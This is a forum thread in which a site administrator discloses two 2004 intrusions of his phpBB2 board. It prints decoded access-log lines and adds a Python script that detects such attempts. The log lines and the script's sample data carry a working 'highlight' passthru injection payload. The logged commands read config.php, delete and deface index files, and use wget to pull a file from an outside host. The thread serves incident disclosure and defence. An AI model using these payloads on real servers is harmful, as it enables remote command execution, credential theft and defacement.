After two hacks during the past few days, I just updated this forum to phpBB2 version 2.0.11.
The previous version contained a vulnerability that could be exploited to gain access to the Ca3DE website and forums. We suffered two such hacks during the past few days. The integrity of the website and forum is restored now; the integrity of the database was never violated.
Background information on the issue is available here:
http://www.phpbb.com/phpBB/viewforum.php?f=14
There are more security issues with PHP (not phpBB2!) that are mostly beyond my control, but I still hope that the measures taken will stop attacks like those of today and yesterday.
All log files are kept and securely stored for law enforcement.
On this occasion, I also added a new set of smilies by Frederic Boogaertsl. These smilies are also used at the http://www.phpBB2.de website, and I think they are much nicer than the old ones.
Board update to phpBB2 version 2.0.11
Last edited by Carsten on 2005-01-02, 16:00, edited 2 times in total.
Best regards,
Carsten
I just finished some log file analysis: Using
cat access.log.51.5 access.log.51.7 | grep -i highlight | grep -i 212.238.220.203 | perl -wne 'use URI::Escape; print uri_unescape($_);'
at the Linux command line for filtering the relevant log files yielded:
212.238.220.203 - - [17/Dec/2004:22:27:58 +0100] "GET /phpBB2/viewtopic.php?t=93&rush=echo _START_; ls; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 HTTP/1.1" 200 15497 http://www.ca3d-engine.de "-" "-" "-"
212.238.220.203 - - [17/Dec/2004:22:28:30 +0100] "GET /phpBB2/viewtopic.php?t=93&rush=echo _START_; uname -a; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 HTTP/1.1" 200 14927 http://www.ca3d-engine.de "-" "-" "-"
212.238.220.203 - - [17/Dec/2004:22:28:41 +0100] "GET /phpBB2/viewtopic.php?t=93&rush=echo _START_; rm index.php; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 HTTP/1.1" 200 13761 http://www.ca3d-engine.de "-" "-" "-"
212.238.220.203 - - [17/Dec/2004:22:28:42 +0100] "GET /phpBB2/viewtopic.php?t=93&rush=echo _START_; rm index.php; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 HTTP/1.1" 200 13950 http://www.ca3d-engine.de "-" "-" "-"
212.238.220.203 - - [17/Dec/2004:22:29:13 +0100] "GET /phpBB2/viewtopic.php?t=93&rush=echo _START_; wget members.lycos.co.uk/icityiv/index.php; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 HTTP/1.1" 200 13417 http://www.ca3d-engine.de "-" "-" "-"
212.238.220.203 - - [19/Dec/2004:11:01:48 +0100] "GET /phpBB2/viewtopic.php?t=109&rush=echo _START_; w; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 HTTP/1.1" 200 153848 http://www.ca3d-engine.de "-" "-" "-"
212.238.220.203 - - [19/Dec/2004:11:01:53 +0100] "GET /phpBB2/viewtopic.php?t=109&rush=echo _START_; uname -a; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 HTTP/1.1" 200 157161 http://www.ca3d-engine.de "-" "-" "-"
212.238.220.203 - - [19/Dec/2004:11:02:09 +0100] "GET /phpBB2/viewtopic.php?t=109&rush=echo _START_; cat config.php; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 HTTP/1.1" 200 164862 http://www.ca3d-engine.de "-" "-" "-"
212.238.220.203 - - [19/Dec/2004:11:03:44 +0100] "GET /phpBB2/viewtopic.php?t=109&rush=echo _START_; id; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 HTTP/1.1" 200 154910 http://www.ca3d-engine.de "-" "-" "-"
212.238.220.203 - - [19/Dec/2004:11:03:51 +0100] "GET /phpBB2/viewtopic.php?t=109&rush=echo _START_; pwd; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 HTTP/1.1" 200 155296 http://www.ca3d-engine.de "-" "-" "-"
212.238.220.203 - - [19/Dec/2004:11:04:24 +0100] "GET /phpBB2/viewtopic.php?t=109&rush=echo _START_; cd ../ ; ls -al; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 HTTP/1.1" 200 219696 http://www.ca3d-engine.de "-" "-" "-"
212.238.220.203 - - [19/Dec/2004:11:04:39 +0100] "GET /phpBB2/viewtopic.php?t=109&rush=echo _START_; cd ../;ls -al; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 HTTP/1.1" 200 219298 http://www.ca3d-engine.de "-" "-" "-"
212.238.220.203 - - [19/Dec/2004:11:04:45 +0100] "GET /phpBB2/viewtopic.php?t=109&rush=echo _START_; cd ../ &&ls -al; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 HTTP/1.1" 200 219626 http://www.ca3d-engine.de "-" "-" "-"
212.238.220.203 - - [19/Dec/2004:11:04:53 +0100] "GET /phpBB2/viewtopic.php?t=109&rush=echo _START_; cd ./ &&ls -al; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 HTTP/1.1" 200 218606 http://www.ca3d-engine.de "-" "-" "-"
212.238.220.203 - - [19/Dec/2004:11:04:59 +0100] "GET /phpBB2/viewtopic.php?t=109&rush=echo _START_; cd ./ && ls -al; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 HTTP/1.1" 200 218306 http://www.ca3d-engine.de "-" "-" "-"
212.238.220.203 - - [19/Dec/2004:11:05:14 +0100] "GET /phpBB2/viewtopic.php?t=109&rush=echo _START_; ls -al; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 HTTP/1.1" 200 218599 http://www.ca3d-engine.de "-" "-" "-"
212.238.220.203 - - [19/Dec/2004:11:05:22 +0100] "GET /phpBB2/viewtopic.php?t=109&rush=echo _START_; pwd; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 HTTP/1.1" 200 155290 http://www.ca3d-engine.de "-" "-" "-"
212.238.220.203 - - [19/Dec/2004:11:05:28 +0100] "GET /phpBB2/viewtopic.php?t=109&rush=echo _START_; ls -l; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 HTTP/1.1" 200 214064 http://www.ca3d-engine.de "-" "-" "-"
212.238.220.203 - - [19/Dec/2004:11:05:41 +0100] "GET /phpBB2/viewtopic.php?t=109&rush=echo _START_; uname; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 HTTP/1.1" 200 153927 http://www.ca3d-engine.de "-" "-" "-"
212.238.220.203 - - [19/Dec/2004:11:05:44 +0100] "GET /phpBB2/viewtopic.php?t=109&rush=echo _START_; uname -a; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 HTTP/1.1" 200 157344 http://www.ca3d-engine.de "-" "-" "-"
212.238.220.203 - - [19/Dec/2004:11:06:12 +0100] "GET /phpBB2/viewtopic.php?t=109&rush=echo _START_; uname -a && l; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 HTTP/1.1" 200 157162 http://www.ca3d-engine.de "-" "-" "-"
212.238.220.203 - - [19/Dec/2004:11:06:16 +0100] "GET /phpBB2/viewtopic.php?t=109&rush=echo _START_; uname -a && ls; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 HTTP/1.1" 200 166863 http://www.ca3d-engine.de "-" "-" "-"
212.238.220.203 - - [19/Dec/2004:11:06:21 +0100] "GET /phpBB2/viewtopic.php?t=109&rush=echo _START_; uname -a && cat config.php; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 HTTP/1.1" 200 168479 http://www.ca3d-engine.de "-" "-" "-"
212.238.220.203 - - [19/Dec/2004:11:06:37 +0100] "GET /phpBB2/viewtopic.php?t=109&rush=echo _START_; cd ../ && cat config.php; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 HTTP/1.1" 200 153798 http://www.ca3d-engine.de "-" "-" "-"
212.238.220.203 - - [19/Dec/2004:11:06:45 +0100] "GET /phpBB2/viewtopic.php?t=109&rush=echo _START_; cd ../ && ls -al; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 HTTP/1.1" 200 219226 http://www.ca3d-engine.de "-" "-" "-"
212.238.220.203 - - [19/Dec/2004:11:06:55 +0100] "GET /phpBB2/viewtopic.php?t=109&rush=echo _START_; cd ../ && ls; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 HTTP/1.1" 200 164029 http://www.ca3d-engine.de "-" "-" "-"
212.238.220.203 - - [19/Dec/2004:11:07:36 +0100] "GET /phpBB2/viewtopic.php?t=109&rush=echo _START_; echo haqed by LENIN666 > ../index.html; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 HTTP/1.1" 200 153405 http://www.ca3d-engine.de "-" "-" "-"
212.238.220.203 - - [19/Dec/2004:11:09:04 +0100] "GET /phpBB2/viewtopic.php?t=109&rush=echo _START_; echo <font color=red size=40>haqed by lenin_666</font> > ../index.html; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 HTTP/1.1" 200 152581 http://www.ca3d-engine.de "-" "-" "-"
212.238.220.203 - - [19/Dec/2004:11:09:44 +0100] "GET /phpBB2/viewtopic.php?t=109&rush=echo _START_; echo <font color="red" size="40">haqed by lenin_666</font>" > ../index.html; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 HTTP/1.1" 200 153566 http://www.ca3d-engine.de "-" "-" "-"
212.238.220.203 - - [19/Dec/2004:11:10:24 +0100] "GET /phpBB2/viewtopic.php?t=109&rush=echo _START_; echo '<font color="red" size="40">haqed by lenin_666</font>' > ../index.html; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 HTTP/1.1" 200 153490 http://www.ca3d-engine.de "-" "-" "-"
212.238.220.203 - - [19/Dec/2004:11:10:51 +0100] "GET /phpBB2/viewtopic.php?t=109&rush=echo _START_; cat ../index.html; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 HTTP/1.1" 200 154380 http://www.ca3d-engine.de "-" "-" "-"
212.238.220.203 - - [19/Dec/2004:11:11:23 +0100] "GET /phpBB2/viewtopic.php?t=109&rush=echo _START_; id; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 HTTP/1.1" 200 155307 http://www.ca3d-engine.de "-" "-" "-"
212.238.220.203 - - [19/Dec/2004:11:11:56 +0100] "GET /phpBB2/viewtopic.php?t=109&rush=echo _START_; w; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 HTTP/1.1" 200 153651 http://www.ca3d-engine.de "-" "-" "-"
212.238.220.203 - - [19/Dec/2004:11:12:00 +0100] "GET /phpBB2/viewtopic.php?t=109&rush=echo _START_; pwd; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 HTTP/1.1" 200 155310 http://www.ca3d-engine.de "-" "-" "-"
I think this is clear enough. (This is the first time that I have ever experienced such a thing, apart from arranged tests. Quite an interesting and instructive matter, though.)
phpBB2 2.0.11 fixes the issue.
IP 212.238.220.203 is permanently banned.
Best regards,
Carsten
theShadow wrote:
nice work man. just out of curiosity how did he get in?
Well, it seems that the
highlight=%27.passthru($HTTP_GET_VARS[rush]).%27
statements in the lines above enabled anyone to execute shell commands on the webserver. I'm not that much of a hacker that I know all the related details, but they are publicly documented on some websites. The commands that were run in each such call are stated in the rush variables above, e.g. the deletion and replacement of index.php in the first attack.
As also the config.php was spied out, I also changed the database password yesterday.
Best regards,
Carsten
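Carsten's grep/perl pipeline pulls the decoded request lines out by hand, and his reply explains that the highlight value is what let the rush variable be executed. This added Python example (not the forum's or phpBB's own code) generalises both into a small detector: it parses combined-format log lines, decodes the query string the way the server does, flags a highlight value that breaks out of the quoted string to call a PHP function, and recovers the command from the referenced variable. The IP address, timestamps and sizes in SAMPLE_LOG are constructed, not taken from the thread.

```python
"""Flag phpBB2 'highlight' code-injection attempts in Apache access logs.
Added example, not the forum's own code: it generalises the grep/perl pipeline
from the thread, decoding each query the way the server does and recovering
the command the request tried to run."""
import re
from urllib.parse import unquote

# Combined-format prefix. The target is matched lazily so lines that were
# already URL-decoded (and therefore contain spaces) still parse.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>.*?) '
    r'HTTP/[\d.]+" (?P<status>\d{3}) (?P<size>\S+)')
# A highlight value shaped like  '.func(arg).'  e.g. '.passthru($HTTP_GET_VARS[rush]).'
INJECT_RE = re.compile(r"'\s*\.\s*(?P<func>[A-Za-z_]\w*)\s*\((?P<arg>[^)]*)\)\s*\.\s*'")
# The argument usually names another query variable that carries the command.
VAR_RE = re.compile(r"\$(?:HTTP_GET_VARS|_GET|_REQUEST)\s*\[\s*['\"]?(?P<var>\w+)['\"]?\s*\]")

def parse_query(target):
    """Split the query on '&' only, as the server does, and percent-decode each
    part. '+' stays literal (like URI::Escape's uri_unescape in the thread) and
    a repeated key keeps its last value, as in PHP."""
    params = {}
    for pair in target.partition('?')[2].split('&'):
        if pair:
            key, _, value = pair.partition('=')
            params[unquote(key)] = unquote(value)
    return params

def analyse_line(line):
    """Return a finding dict for an injection attempt, or None for a benign line."""
    m = LOG_RE.match(line)
    if not m:
        return None
    params = parse_query(m.group('target'))
    inj = INJECT_RE.search(params.get('highlight', ''))
    if not inj:
        return None
    ref = VAR_RE.search(inj.group('arg'))
    # A command containing '&&' is cut at its first '&' by the query parser, so
    # the recovered string is exactly what the server would have executed.
    command = params.get(ref.group('var')) if ref else inj.group('arg').strip('\'" ')
    return {'ip': m.group('ip'), 'time': m.group('ts'), 'func': inj.group('func'),
            'command': command, 'status': int(m.group('status'))}

def scan(lines):
    """Run analyse_line over an iterable of log lines and keep the findings, in order."""
    return [f for f in map(analyse_line, lines) if f]

# Constructed sample lines (documentation IP, not the address from the thread):
# a benign search, a raw percent-encoded attempt, and an attempt that used '&&'.
SAMPLE_LOG = [
    '192.0.2.10 - - [17/Dec/2004:22:20:00 +0100] "GET /phpBB2/viewtopic.php?t=93&highlight=engine HTTP/1.1" 200 15000 "-" "-"',
    '192.0.2.10 - - [17/Dec/2004:22:27:58 +0100] "GET /phpBB2/viewtopic.php?t=93&rush=echo%20_START_;%20ls;%20echo%20_END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 HTTP/1.1" 200 15497 "-" "-"',
    '192.0.2.10 - - [19/Dec/2004:11:04:45 +0100] "GET /phpBB2/viewtopic.php?t=109&rush=echo _START_; cd ../ &&ls -al; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 HTTP/1.1" 200 219626 "-" "-"',
]

if __name__ == '__main__':
    for f in scan(SAMPLE_LOG):
        print(f"{f['time']} {f['ip']} {f['func']}() -> {f['command']!r}")
```

Splitting on `&` also accounts for the retries visible in the log above: a query parser truncates a `cd ../ && ls -al` payload at the first `&`, so the detector reports exactly what the server received.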